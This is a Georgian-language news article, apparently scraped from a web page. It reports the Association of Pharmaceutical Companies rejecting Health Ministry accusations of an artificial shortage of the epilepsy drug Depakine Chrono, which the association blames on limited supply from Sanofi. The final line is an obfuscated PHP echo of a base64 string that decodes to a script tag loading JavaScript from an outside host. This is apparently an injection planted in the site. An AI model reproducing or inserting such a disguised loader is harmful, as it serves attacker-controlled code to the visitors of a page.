celsiusi
ავერსი საქკაბელი

 ეპილეფსიის სამკურნალო მედიკამენტი „დეპაკინი ხრონო“ საქართველოს ტერიტორიაზე იმპორტირებისთანავე იყო მიწოდებული როგორც კერძო, ასევე ქსელური სააფთიაქო დაწესებულებებში რეალიზაციისათვის, მაგრამ შეზღუდული და არასაკმარისი რაოდენობიდან გამომდინარე, აღნიშნული მედიკამენტი სწრაფად ამოიყიდა, – ამის შესახებ ნათქვამია ფარმაცევტული კომპანიების ასოციაციის განცხადებაში.

განცხადებაში ასევე აღნიშნულია, რომ ფარმაცევტული კომპანიების ასოციაცია მისი წევრი კომპანიების მიმართ ბრალდებებს გმობს.

„მაღალი საზოგადოებრივი ინტერესიდან გამომდინარე, ფარმაცევტული კომპანიების ასოციაციას სურს, გამოეხმაუროს საქართველოს ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის სამინისტრის მიერ გავრცელებულ ინფორმაციას. სამწუხაროდ, ჯანდაცვის სამინისტროს სამედიცინო და ფარმაცევტული საქმიანობის რეგულირების სააგენტომ ეპილეფსიის სამკურნალო პრეპარატ „დეპაკინ ხრონზე“ სავარაუდო ხელოვნური დეფიციტის შექმნაზე ფაქტების გამოვლენის შესახებ ინფორმაცია გაავრცელა გადაუმოწმებელ მონაცემებზე დაყრდნობით.

მეტიც, ფარმაცევტული ასოციაციის წევრებზე ბრალის დადება მოხდა არაკეთილსინდისიერ შეთანხმებებსა ან დომინირებული მდგომარეობის არასათანადოდ გამოყენების ფაქტზე მხოლოდ და მხოლოდ სავარაუდო ინფორმაციასა და დაშვებების საფუძველზე. ფარმაცევტული კომპანიების ასოციაცია აცხადებს, რომ მედიკამენტი „დეპაკინი ხრონო“, რომელიც წარმოებულია კომპანია „სანოფის“ მიერ, მწარმოებლის მხრიდან შეფერხებული საწარმოო პროცესებიდან გამომდინარე, ბაზარზე იქნა იმპორტირებული მცირე რაოდენობით და მწარმოებელმა მხარემ ვერ მოახერხა საჭირო რაოდენობით მედიკამენტის მოწოდება დამკვეთებისთვის. ასევე, შეფერხებულია აღნიშნული მედიკამენტის იმპორტი პარალელური რეჟიმით თურქეთიდანაც, ვინაიდან თურქული მხარე ვერ უზრუნველყოფს მედიკამენტის რეფერენტულ ფასში მოწოდებას.

სრული პუხისმგებლობით ვაცხადებთ, რომ მედიკამენტი „დეპაკინი ხრონო“ საქართველოს ტერიტორიაზე იმპორტირებისთანავე იყო მიწოდებული როგორც კერძო, ასევე ქსელური სააფთიაქო დაწესებულებებში რეალიზაციისათვის, მაგრამ შეზღუდული და არასაკმარისი რაოდენობიდან გამომდინარე მოხდა აღნიშნული მედიკამენტის სწრაფი ამოყიდვა.

ფარმაცევტული კომპანიების ასოციაცია გმობს მისი წევრი კომპანიების მიმართ მორიგ ჯერზე ბრალდებებს და ეჭვობს, რომ წამოწყებული კამპანია სექტორის რეპუტაციის შელახვისკენ არის მიზანმიმართული, რაც დარგის თითოეული წევრისთვის ყოვლად მიუღებელი და დასაგმობია.

კიდევ ერთხელ ვაცხადებთ, რომ ასოციაციის წევრებისათვის მიუღებელია და ემიჯნებიან ბიზნესის არაეთიკურ წარმოებას, მით უმეტეს პაციენტების ხარჯზე და მუდმივად ზრუნავენ, რომ მათ მიერ გაწეული მომსახურება შეესაბამებოდეს საერთაშორისო სტანდარტებს, მომხმარებლებს მიეწოდოს ხარისხიანი, უსაფრთხო და ეფექტიანი ფარმაცევტული პროდუქტი“, – ნათქვამია განცხადებაში.

საქართველოს ჯანდაცვის სამინისტრომ დღეს გაავრცელა ინფორმაცია, რომლის მიხედვითაც, მედიკამენტებზე რეფერენტული ფასების ამოქმედების შემდეგ რამდენიმე დიდი ფარმაცევტული ქსელის მხრიდან მორიგი არაკეთილსინდისიერი ქმედება დაფიქსირდა. მათივე ცნობით, რეგულირების სააგენტომ ეპილეფსიის სამკურნალო პრეპარატზე სავარაუდო ხელოვნური დეფიციტის შექმნის ფაქტები გამოავლინა.

298
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");